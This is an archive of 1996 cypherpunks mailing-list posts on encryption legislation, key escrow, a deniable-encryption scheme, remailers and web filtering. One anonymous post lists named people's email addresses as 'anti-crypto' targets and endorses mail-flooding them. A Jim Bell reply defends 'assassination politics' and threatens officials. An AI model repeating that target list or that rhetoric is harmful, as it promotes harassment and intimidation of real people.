even discuss this application directly:  "Note that this AND-gate
computation, where both parties want to hide their input from each
other, has a meaningful application: consider the situation where Alice
and Bob have just met, and each considers dating the other.  Neither
wishes to lose face in the following sense: if Alice wants a date but
Bob doesn't, Alice does not want to let Bob know that she wanted the
date.  And the same holds for Bob.  In other words: if a party does not
want the date it does not find out the other party's decision."

The solution is reasonably practical, involving scrambled truth tables
and bit commitments, and is related to some of Chaum's work on
zero-knowledge.  The paper is a bit theoretical and hard to read,
though.  I can write up the protocol if anyone is interested.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMT8p4RnMLJtOy9MBAQHUAQIAv6tTbhLvTnbxX+7BlSIQcxCBfF+FhL1E
mR57Ks8Rklg2PxEotSl9BDEtKWVFoqXg8UdNhsj6d3ASFzdQe0B6Hg==
=tCch
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Fri, 8 Mar 1996 00:07:14 +0800
To: cypherpunks@toad.com
Subject: Anonymous remailers and Leahy bill
Message-ID: <960307102609.2020616c@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>I am assuming they fix the obvious error in the phrasing above.  

Until they do, we can only guess at the intent.

>"Thanks for the use of your nifty anonymous remailer.  Under a different 
>name, I intend to use this remailer (along with others) to transmit child 
>pornography, plot terrorism, and do all of my drug deals.  You've made my 
>life so much more secure!"

At this point, Bob has no choice other than to reply with: "I assume you are 
joking however since what you have stated is in violation of numerous laws,
we have no choice other than to disable your account. If we find that 
illegal acts have been committed using this remailer, we will have no choice
other than to report such actions."

Anyone stupid enough to make a statement like this deserves to be disabled.

>At that point, Bob is GUILTY of violation of the Leahy bill, because his 
>encrypted anonymous remailer:

No, if Bob were to follow the above scenario, he would already be guilty of
terminal stupidity.

>So maybe the word gets out, occasionally.  At that point, usage of anonymous 
>remailers declines, and people willing to risk operating one declines.  A 
>few come up which are run by the Feds, which log anyone who  attempts to use 
>it...

Declines ? They are only protection from amateurs. Do you really not 
believe that everything in and out of anon.penet.fi & others is not 
monitored *at the ISP/carrier level* ?

						Warmly,
							Padgett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 8 Mar 1996 01:59:23 +0800
To: (Recipient list suppressed)
Subject: Newest CACM and Key Escrow
Message-ID: <9603071605.AA04844@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


        
The newest Communications of the ACM (March 90) is entitled "How to Use Key
Escrow."  I haven't read it yet, but on a quick glance, I don't see some of
the  newer schemes I've heard of, but there is an article "taxonomy of key
escrow encryption systems" by Denning and  Branstad -- Which does briefly
mention of the Lotus scheme and some of the other published schemes that I
was thinking of.
_______________________
Regards,            8146th member of the CIEC coalition
Joseph Reagle       http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 8 Mar 1996 05:45:45 +0800
To: cypherpunks@toad.com
Subject: CDT on crypto bills
In-Reply-To: <v01520d00ad62676114a6@[204.157.127.21]>
Message-ID: <UlDmdfm00YUuQO0Q1m@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message begins here ----------

Date: Tue, 5 Mar 1996 23:12:49 +0100
To: "Declan B. McCullagh" <declan+@CMU.EDU>
From: jseiger@cdt.org (Jonah Seiger)
Subject: Re: NYT: Encryption compromise bill introduced
Cc: Fight Censorship Mailing List <fight-censorship+@andrew.cmu.edu>,
        jim@RSA.COM

If you read our statement, you will see that we agree completely with EFF &
Jim that the new crime is unnecessary and needs to be addressed.

As for the second issue, I understand EFF's concerns, and this is
definitely an issue that needs further clarification and discussion. But
you should note that the bills do not in any way impose key escrow (and
only the Senate bill contains these provisions anyway).

In fact,the legislation does precisely the opposite in two ways:

1. The bill explicitly affirms the rights of Americans to use any form of
   cryptography they choose domestically.

2. By directly attacking export controls, the legislation undermines the only
   lever the Administration has in imposing Clipper and Clipper II. The Clipper
   and Clipper II policies are based on the assumption that the market in most
   cases will support only one version of a particular crypto application.
   By encouraging only the export of cyrpto w/key escrow mechanisms, the
   Administration believes that they can force the domestic market to adopt
   escrow as well. This has not worked yet, but it *has* forced a stalemate
that
   has led to a very little privacy and security for the Net.

   By undermining the only leverage the Administration has for left to impose
   key escrow domestically (beyond an explicit effort to ban it
outright), these
   bills effectively remove the current threat of a government imposed domestic
   escrow crypto policy, and allow the market for strong cryptography to
   flourish.

So again, CDT believes that this legislation represents the best
opportunity we have had yet to provide the Internet with the privacy
protections and security it desperately needs. There are most certainly
areas that we would like to see changed and/or clarified, but that should
not overshadow the important opportunity these bills represent.

Jonah

>Thanks for the clarification, Jonah. I agree the bill will undercut
>Clipper II, but I share the concerns outlined in the EFF statement,
>which says the bill:
>
>  *  Makes it a new crime to "use encryption to obstruct justice", with
>     5-10 year sentences, plus fines.  In plain language, this is a
>     extra criminal charge that can be applied when police are frustrated
>     in an investigation but happen to catch someone breaking the law in
>     some other way.
>
>  *  Provides a legal infrastructure for key escrow, a system in which
>     all users' keys are copied to permit government access.
>
>Jim Bidzos is the CEO of RSA Data Security, and he supports Leahy's
>bill. His mail is attached below.
>
>-Declan
>
>---------- Forwarded message begins here ----------
>
>Date: Tue, 5 Mar 96 13:26:39 PST
>From: jim@RSA.COM (Jim Bidzos)
>Message-Id: <9603052126.AA19534@RSA.COM>
>Cc: cypherpunks@toad.com
>
>
>I'm in favor of the Bill because it specifically prevents, by law, the
>US Govt from mandating key escrow. Also because it would, by law,
>force export control of crypto out of the Dept. of State and into the
>Dept.  of Commerce, effectively allowing any crypto used in the US and
>"widely available" to be exported. (The bill does a few other things.
>One, it provides for criminal penalties for key holders who abuse
>their role as an escrow agent, assuming anyone *chose* to use key
>escrow.  Second, it makes the use of encryption -any encryption- a
>crime if used in the commission of or support of any criminal
>activity. I think the bill would be better off without these
>provisions, but I suspect this is an attempt to give the
>administration something.)
>
>I anticipate that the Administration, led by the intelligence and law
>enforcement interests, will vigorously lobby against this bill...

--
Jonah Seiger, Policy Analyst          Center For Democracy and Technology
<jseiger@cdt.org>                          1634 Eye Street NW, Suite 1100
                                                    Washington, DC  20006
PGP key via finger                                    (v) +1.202.637.9800
http://www.cdt.org/                                   (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger.html
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 9 Mar 1996 06:57:50 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: new netscape servers
Message-ID: <199603072142.NAA16559@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:14 PM 3/7/96 -0500, Michael Froomkin wrote:

>What law applies to a certificate used in a multi-jurisdictional
>transaction is less obvious to me than I would like.  I think I have
>talked a student in my seminar into writing a paper to educate me. 

Are your concerns international, interstate, or (it seems unlikely) intrastate?

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 9 Mar 1996 06:16:55 +0800
To: cypherpunks@toad.com
Subject: steganographic trick
Message-ID: <199603072228.OAA24671@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




here is an interesting trick/algorithm that I've not seen before, although I
admit I'm not intimately familiar with all the crypto formulas that
others here may be aware of, so this may have been toyed with before.

in pondering steganography, it seems to me there could be made a 
distinction between two types. in the "classic" type, say hiding
data in the low bits of a digitized image, the whole existence
of an encrypted "covert" message is totally concealed. that is,
not only is the message concealed but the existence of it is
as well.

now consider a different kind of steganography, in which it is
clear there is an encrypted piece of data. the problem with
all steganographic crypto is that to use your data, you have to
have your stego tools handy, and the "feds" could see these tools
and accuse you of hiding data.

imagine an application where you freely admit that you have your
cryptographic tools, and that you are even willing to tell the
"feds" the key for your data. they run the crypto program, and
indeed the file decrypts. however, unknown to them, you have given
them a key that decrypts the file into something meaningful yet
benign, such as a cookie recipe, not
your plans for the overthrow of the state. in other words, 
"interlaced" or "coincident" within the same file is your secret
data. given one key, it decrypts into one set of data, and given
another key, it decrypts into another set of data.

there are probably many different ways to do this. of course the distinction
of what I am proposing and two different files, each with different
keys (which is already feasible), is not all that crisp. anyway, 
I pursued this anyway to come up with an algorithm.

pick a large prime, P. now pick two other large primes that are less
than sqrt(P), P1, P2 (actually all that is required is that P1*P2 < P). 
 the data in the file is organized into blocks of information modulo P. 
P1 is the "harmless" key for message 1 (M1), and P2 is the "real" key for
message 2 (M2).

now the trick is to put data into your file one "piece" at a time
such that it decrypts into either the corresponding "piece" of M1
given decryption by P1, or M2 given P2. I think some people can
anticipate what comes next: the encoding of the data for M1 is
contained in the "segment M" modulo P1, and M2 is contained modulo P2.

the chinese remainder theorem lets us find the unique number N such
that N mod P1 = M1, and N mod P2 = M2. "N" is the data that is stored
in the file.

I'm being a little sloppy in notation here: the overall message
is broken into segments mod P-- the above algorithm is simply repeated
over each "segment".

given all the caveats about complexity of factoring etc., if P1, P2
are large and not "close" to each other (i.e. one could find P1 by
searching in the "vicinity" of P2), this would be a secure algorithm
as far as I can tell.

to decrypt, the file is broken up into pieces mod P, and then each
of these pieces has a value mod P1 or mod P2 that is used as the
value of that piece.

hence, we have an algorithm in which data is stored "coincident" or "adjacent"
in a file. the feds could potentially observe that the key you give
them, P1 < sqrt(P), and realize that there is "room" left over to store a 
secret message.  but if you store all your files that way, they have
nothing to go on. in fact you could assert, "yes, that was once a file
with two messages in it, but I deleted the other one. it's key used to
be Px". Px is a random number.

of course, this method could be expanded so that any file has any number
of secret pieces interspersed in it, each only available given knowledge
of its secret key.

again, the same thing can be accomplished by concatenating multiple
files, each with a different key, or even alternating bytes or bits
in a file, but I thought it would be interesting
to find something that had this "coincident" or "adjacent" property 
based on the modulo and large prime properties used everywhere in
modern crypto.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Mar 1996 22:16:26 +0800
To: cypherpunks@toad.com
Subject: Announce: 155mbps ATM 3DES crypto gateway
Message-ID: <199603071341.OAA29152@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Secant Network Technologies announces:
The Key Agile Encryption System is an affordable perimeter security
system that provides privacy through high speed cryptography for
information traversing public Asynchronous Transfer Mode networks.
The cryptographic units function as "bump in the fiber" security
interfaces between a secure LAN and a public network.
As data crosses this interface, the system encrypts each ATM cell's payload
without affecting the header. Encrypted cells pass through the
public network infrastructure and are decrypted upon arriving at
the destination LAN. The benefit is that the user can conduct business
as usual within the LAN and only encrypt the data as it enters
the non-secure public network (or non-secure area of a LAN).
Many individual workstations, servers or other end nodes may be protected
by a single encryption unit. The system provides privacy and access
control guarantees when using public ATM networks today, eliminating
the need to wait for implementation and availability of pending
ATM Forum security standards. System operation is transparent to
all network and end user systems.

Available: summer 1996

Physical interfaces: single mode SONET OC-3c, multi mode SONET OC-3c,
        T3 carrier, T1 carrier.

Key management: proprietary method, transparent to network and end user
        equipment, compliant with UNI 3.0/3.1 specifications. SVC's
        handled transparently, PVC support available.
        Public key based authentication. PKCS and X.509 compliant
        public key certificates are supported. Dynamic key update
        based on policy - transparent to end systems.

Key agility: up to 65,534 active VC's per cryptographic unit.
        Each active VC has a unique key.

Encryption algorithms used: triple DES for cell payload encryption,
        triple DES, RSA, and MD5 for key management.
        DES mode agility: single DES, 3DES ECB or 3DES long cycle chaining.

True hardware random number generation (Johnson noise).

Performance: full duplex encryption/decryption at the OC-3c (155Mbps) rate.
        Key management support for up to 35 secure calls per second
        Approximately 16 microseconds latency.

See: http://www.secantnet.com/ for more details and for contact information.

Based on over 2 years of ARPA funded research:
http://www.mcnc.org/HTML/ITD/ANT/Enigma2.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Mar 1996 13:24:28 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT%TCCSLR@emamv1.orl.mmc.com>
Subject: Re: Anonymous remailers and Leahy bill
Message-ID: <m0tuotL-00094NC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Note to the rest of you:  Observe how Mr. Peterson carefully avoids quoting 
any material that was contained in my notes to him.  This makes his failure 
to respond to my points less clear.  This is entirely intentional on his part.


At 03:51 PM 3/7/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Understand though I feel no obligation to assist you in disagreeing 8*).

While technically correct, that comment was bullshit (at least as applied to 
my previous commentary) and you know it.  I've NEVER asked to be "assisted" 
in freedom; that's not what I'm complaining about.  I think it's clear you 
can't distinguish between "assisting" and "failing to prohibit."

Try again.

>Personally, I believe that this country is stronger than any individual 
>(or individual congress).

Silly truism.  What does this mean, anyway?

>I do disagree with your concept of assasination politics in that is is not 
>only "overkill" but a violation of *their* rights.

Who, exactly, are you referring to when you say "*their*"? rights?  An 
innocent citizen, unaffiliated with government?  Or somebody who violates my 
rights, steals my money to do it, etc.  It's not surprising that you weren't 
more clear.

> To me is is enough
>to simply remove a person from the ability to apply power in a way that
>would irritate me. 

They can always resign first. Nothing in the system I describe prevents 
this.   It _may_ save their lives.

>In an electronic world this is relatively easy.

Problem is, we don't yet live in "an electronic world."  Or, at least, our 
freedom is dependant on being able to deal with others in the non-electronic 
world.  And the government thugs of the world are busily trying to keep 
Internet from staying relatively free of controls and coercion.


>As for crypto, I feel that the government's desires are irrelevant since
>they lack the ability to control or even to detect it if we choose to 
>hide it.

That's a dangerous position to take.  When a law is on the books that the 
police can't easily enforce, they generally only enforce it against the 
people they perceive as being their enemies, and are worth spending the time 
to harass.

>Certain things I would like to do internationally would be easier if the
>US would clear the way with other nations (like France) first. In exchange
>I am willing to use key escrow (if powerful enough) so long as I hold
>my own keys.

Huh?  What does this comment mean?  I wouldn't trust "key escrow" EVEN IF I 
was the only one to "hold the keys."  The reason is simple:  When I make a 
crypted telephone call, I was the session key used to evaporate the instant 
the call ends.  I don't want to allow the government to try to coerce me 
into revealing "my keys" because if there is no reason to keep those keys, 
they should not be kept.  Simple.


>None of this has anything to do with my personal agenda except peripherally
>other than I tend to take a very long view of things and prefer to exert
>gentle pressures to get there.

In other words, you're as spineless as a jellyfish.  I prefer methods more 
likely to get results.  And when it's RIGHTS we're talking about, I will not 
hesitate to punish people who violate them.


> Secure E-Mail is a task that I expect to 
>take about 2-3 years of my time and 5 years to reach completion. If this
>happens sooner, fine. I do not expect it to take longer since I expect to
>have other interests by then.

Which means that you have no persistence nor sense of priorities.  Five 
years from now and the "war" will probably be over. 

>Your postings assist me with this. Thank you.

No, my postings show how silly your postings are.

BTW, "reverse psychology" doesn't work on anyone above the age of five or so.


Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 9 Mar 1996 23:34:32 +0800
To: cypherpunks@toad.com
Subject: Re: Switchboard
Message-ID: <199603072343.PAA18580@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


At 10:05 PM 3/6/96 -0800, Steven Weller wrote:
>Check out www.switchboard.com. From the blurb:
>
>find people
[...]
>  find
>  businesses
[..]

They forgot "Change the entry for any person or business in the US from a
throwaway AOL trial account, or using an anonymous web proxy and
pseudonymous remailer." Hope this helps.

>Is this the same data that was supposed to go on that Lotus CD-ROM? Is this
>publicly available info?

It's from the Database America CD-ROM, which is one of the cheaper and less
complete ones. It's all publicly available information, or was. There are
probably tens of thousands of numbers that have been changed or unlisted
recently.

Unlike the original CD-ROM, Switchboard does not provide a (easy) way to
build large mailing lists or do reverse address lookups (like "who lives at
this address on Pennsylvannia Avenue" or "who might be on vacation in a
building with line of sight to this place").

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Sat, 9 Mar 1996 06:57:53 +0800
To: mutant@compuville.com
Subject: surfwatch filtering
In-Reply-To: <199603072056.PAA05237@lemieux.compuville.com>
Message-ID: <199603072144.PAA19620@kenya.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



mutant@compuville.com writes:
 > >BTW, did you hear that IO got on the SurfWatch "bad list" ...
 > 
 > A quick phone call to the Surf Watch people revealed that they rarely 
 > block whole domains, and that they are not currently blocking all of 
 > io.com. 

Yup, seems it was a flase alarm.  Sorry gang.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 06:04:12 +0800
Subject: No Subject
Message-ID: <QQagbf09635.199603072148@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message begins here ----------

From: shabbir@vtw.org (Shabbir J. Safdar)
To: Stanton McCandlish <mech@eff.org>
cc: declan+@cmu.edu (Declan B. McCullagh), fight-censorship+@andrew.cmu.edu,
        jim@rsa.com
Subject: Re: NYT: Encryption compromise bill introduced 
Date: Wed, 06 Mar 1996 15:14:01 -0500
Sender: shabbir@panix.com


The Leahy bill is actually much better than Stanton lets on.  Take a
look at it, it affirms Americans' right to choose whatever algorithm or
technique they'd like, as well as takes great pains to go on record to
say that Congress treaded very carefully to preserve Americans' right
to not use key escrow algorithms, and if they did, not to use escrow
agents.  You don't get much more of a guarantee than that.

Regardless of the ulterior motives of the White House, key escrow
programs are still voluntary as read on the books.  The best we can
write into a law is to have our rights reaffirmed.  Leahy has given
this to us in spades.

Let's not soft-pedal this legislation.  Leahy and Goodlatte are going
head to head with the White House to undermine the strongarm export
tactics of Clipper and Son of Clipper.  They've stuck their necks out for
us, we need to back them up.

Just wait until the White House starts to act in reaction to this.  It's
not going to be pretty....

-Shabbir J. Safdar * Online Representative * Voters Telecomm. Watch (VTW)
 http://www.vtw.org/ * Defending Your Rights In Cyberspace

Stanton McCandlish writes:
>> Date: Tue, 5 Mar 96 13:26:39 PST
>> From: jim@RSA.COM (Jim Bidzos)
>> Message-Id: <9603052126.AA19534@RSA.COM>
>> Cc: cypherpunks@toad.com
>> 
>> 
>> I'm in favor of the Bill because it specifically prevents, by law, the
>> US Govt from mandating key escrow. 
>
>This is only true of the Goodlatte bill. The Leahy bill just explicitly 
>does not mandate GAK.  Goodlattes does this, and goes further, preventing 
>the Administration from doing so.
>
>Needless to say, we'd like to see the two bills merged, and the better
>features of each kept.
>
>> I anticipate that the Administration, led by the intelligence and law
>> enforcement interests, will vigorously lobby against this bill...
>
>Right. We don't expect it to pass, but it could be an important step in 
>raising the issues.
>
>
>--
><HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
></A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
></A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
></A><P>        Online Activist    </HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "B. Schneier" <bs208@newton.cam.ac.uk>
Date: Fri, 8 Mar 1996 02:27:21 +0800
To: cypherpunks@toad.com
Subject: Re: TET cryptosystem
In-Reply-To: <199603071529.HAA04759@well.com>
Message-ID: <199603071719.MAA06009@gibbs.newton.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


*************************************************************************
This is a temporary e-mail address; I am in Cambridge until 12 March.
Continue to send mail to schneier@counterpane.com; it forwards by itself.
*************************************************************************

> Teledyne (TET) is out marketing a "new" crypto system as a
> competitor against DES and what TET calls "linear" cryptosystems. 
> They are claiming a non-linear approach in which (as best I can
> tell) they are permuting the s-boxes and using 4 bit/16 entry
> substitution tables.
> 
> They are also asserting that these "key generated substitution
> tables and inter-round permutations" are supported by "nonlinear
> orthomorphic mappings generated from arbitrary key" (and that this
> is patented) and "row-complete Latin Squares generated from an
> arbitrary key" (and that this is also patented).
> 
> The claimed benefits include being invulnerable to differential and
> "linear" cryptanalysis, no linear key/data interaction to hide,
> that this results in the tables and permutations being
> "transient/secret," and that fewer rounds are needed (fewer than
> what, I don't know) to attain "resistance to cryptanalysis."

This explanation is so laced with nonsensical buzzwords that the algorithm
is probably absolute nonsense.  I can't tell you (because of NDAs) how
many times I've seen proprietary algorithms that make all sorts of
grandeose claims of security and are actually terrible.

Bruce
**************************************************************************
* Bruce Schneier
* Counterpane Systems         For a good prime, call 391581 * 2^216193 - 1
* schneier@counterpane.com
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 06:58:00 +0800
Subject: No Subject
Message-ID: <QQagbh16101.199603072223@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



[In reply to Shabbir's message. -Declan]

---------- Forwarded message begins here ----------

From: Stanton McCandlish <mech@eff.org>
Message-Id: <199603062155.NAA22301@eff.org>
Subject: Re: NYT: Encryption compromise bill introduced
To: shabbir@vtw.org (Shabbir J. Safdar)
Date: Wed, 6 Mar 1996 13:55:07 -0800 (PST)
Cc: declan+@cmu.edu, fight-censorship+@andrew.cmu.edu, jim@rsa.com
In-Reply-To: <199603062014.PAA02169@panix4.panix.com> from "Shabbir J.
Safdar" at Mar 6, 96 03:14:01 pm

> The Leahy bill is actually much better than Stanton lets on.  Take a
> look at it, it affirms Americans' right to choose whatever algorithm or
> technique they'd like, as well as takes great pains to go on record to
> say that Congress treaded very carefully to preserve Americans' right
> to not use key escrow algorithms, and if they did, not to use escrow
> agents.  You don't get much more of a guarantee than that.

Sure you do: Goodlatte's more direct prohibition on the Exec. branch 
mandating Key Escrow.  What's the problem here?  We know Goodlatte's 
version, on this provision at very least, is better. Why can't we just 
agree that it is, and support that?  Goodlatte's bill isn't competing 
with Leahy's, they were introduced simultaneously in different chambers, 
and are intended to get the same message across. I can't see a problem 
with saying "we like this particular phrasing better, let's have it in 
both versions."  The entire point of all this is to have the same bill on 
both sides of Congress anyway.  It can either happen early, or (on the 
off chance it ever gets that far) in conference committee. Here we have a 
large say. In conf. cmte. we have almost no say.  Again, what's the problem?
What are we arguing about?
 
> Regardless of the ulterior motives of the White House, key escrow
> programs are still voluntary as read on the books.  The best we can
> write into a law is to have our rights reaffirmed.  Leahy has given
> this to us in spades.

I disagree.  A better thing we can write into law is to simultanously 
have rights reaffirmed, and send a more direct message to the Admin that it 
cannot tread here.

> Let's not soft-pedal this legislation.  

Let's not hard sell flawed parts of it, when fixes are not just 
available but already introduced as "live" legislation.

> Leahy and Goodlatte are going
> head to head with the White House to undermine the strongarm export
> tactics of Clipper and Son of Clipper.  They've stuck their necks out for
> us, we need to back them up.

Certainly.

> Just wait until the White House starts to act in reaction to this.  It's
> not going to be pretty....

No kidding.

I expect either an attempt to mandate escrow, a worsening of the export 
controls, and/or an all-out assault on American's rights to encrypt at 
all, or without some kind of worse-than-GAK registry or licensing.  If 
not all of the above.


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 07:24:51 +0800
Subject: No Subject
Message-ID: <QQagbj22221.199603072258@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Mar 1996, cjs wrote:

> > 
> > BTW, did you hear that IO got on the SurfWatch "bad list" because there
> > were more than 25 complaints about objectionable material in the io.com
> > domain.  (Apparently, when SurfWatch hears more than 25 complaints
> > against a particular domain, the just deny access to the whole domain
> > rather than particular URLs.)
> 
> So.. whats the number to call? Microsoft has material on their site I
> object too. =)

And let's not forget the really objectionable stuff at 
http://www.buchanan.org/pjbindex.html (the Buchanan Campaign web site).

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 8 Mar 1996 11:55:54 +0800
To: boykin@pobox.com (Oscar Boykin)
Subject: Re: crypto ++ where?
In-Reply-To: <2.2.32.19960307063219.0097bc70@fitten95.residence.gatech.edu>
Message-ID: <199603072325.SAA22694@homeport.org>
MIME-Version: 1.0
Content-Type: text


Oscar Boykin wrote:

| How can I obtain crypto++, I seem to have deleted the email I had
| reguarding it. 

I've got a page of cryptographic libraries, with information comparing 
crypto++, cryptolib, the python crypto library and rsaref.  It
includes pointers to the software, what they contain, and other useful
tidbits.  I'm open to suggestions for improvement.

www.homeport.org/~adam/crypto/


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 8 Mar 1996 14:12:01 +0800
To: cypherpunks@toad.com
Subject: SurfWatch
Message-ID: <199603080236.SAA17345@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:59 PM 3/7/96 -0800, Timothy C. May wrote:
>If SurfWatch can be sued for a "bad review," then Siskel and Ebert had
>better find a new line of work.

As long as a reviewer corrects errors, as SurfWatch seems to be willing to
do, I think they are relativly suit-proof.  If they don't, well - anyone
can be sued for anything.  I'll let the lawyers comment on the possibility
of success.

Does anyone know the protocol SurfWatch uses to communicate their ratings
to the software that runs in individual's PCs?  Does it allow monitoring
browsing patterns?

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 11 Mar 1996 03:00:52 +0800
To: cypherpunks@toad.com
Subject: Re: ANTI-CRYPTO CYPHERPUNKS
Message-ID: <199603080239.SAA00668@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
M. Blaze: mab@crypto.com, mab@research.att.com
J. Bizdos: jim@rsa.com
S. Safaddar: shabbir@vtw.org
D. Weinstein: djw@vplus.com
P.. Peterson: padgett@hobbes.orl.mmc.com

I wish to point out that some of these people are just probably misguided
and should be educated not hurt. A full mail spool is educatio[nal but
but it would IMHO be wrong to do mailbombing the postmaster or hacking
their accts etc. Give them a chance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 8 Mar 1996 12:19:05 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: new netscape servers
In-Reply-To: <199603072142.NAA16559@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.91.960307184407.26760G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


My paper focuses on interstate.  International is probably harder; on the 
other hand the parties are more likely to make specific provisions in 
their agreement about what law applies.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 08:09:45 +0800
Subject: No Subject
Message-ID: <QQagbn01690.199603072347@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> mentioned:

> The big problem with this is that net phones can be subject to
> delay & drop out, and I don't want to deal with that when I'm talking
> on the phone.

Adam,
Yes, and that's good news.  We can claim, while we are building up our
infrastructure, that we have a low-quality service that cannot compete
with the current LD carriers.  Meanwhile, several companies and committed
enthusiasts are solving IPhone's technological problems.  Also, ATM and
other high-bandwidth technologies that the LD carriers are deploying can
bring them profits when IPhone users request the _fast_ Internet.

But the real money is in the billing system.  And an efficient,
decentralized ecash infrastructure will change the world.  A cheap
telephone-to-telephone long distance and international voice service,
which people do want to buy, could provide the cash flow to jump start it.

  CW




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 08:27:28 +0800
Subject: No Subject
Message-ID: <QQagbn03009.199603072358@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



On the mailing list for the "Electronic Frontier Canada" (similar to, but
not a part of EFF), David Jones (djones@insight.dcss.McMaster.CA) writes:
>
>      Feds want encryption; Police opposition ignored.
>
>The federal government wants its employees, and Canadians in general,
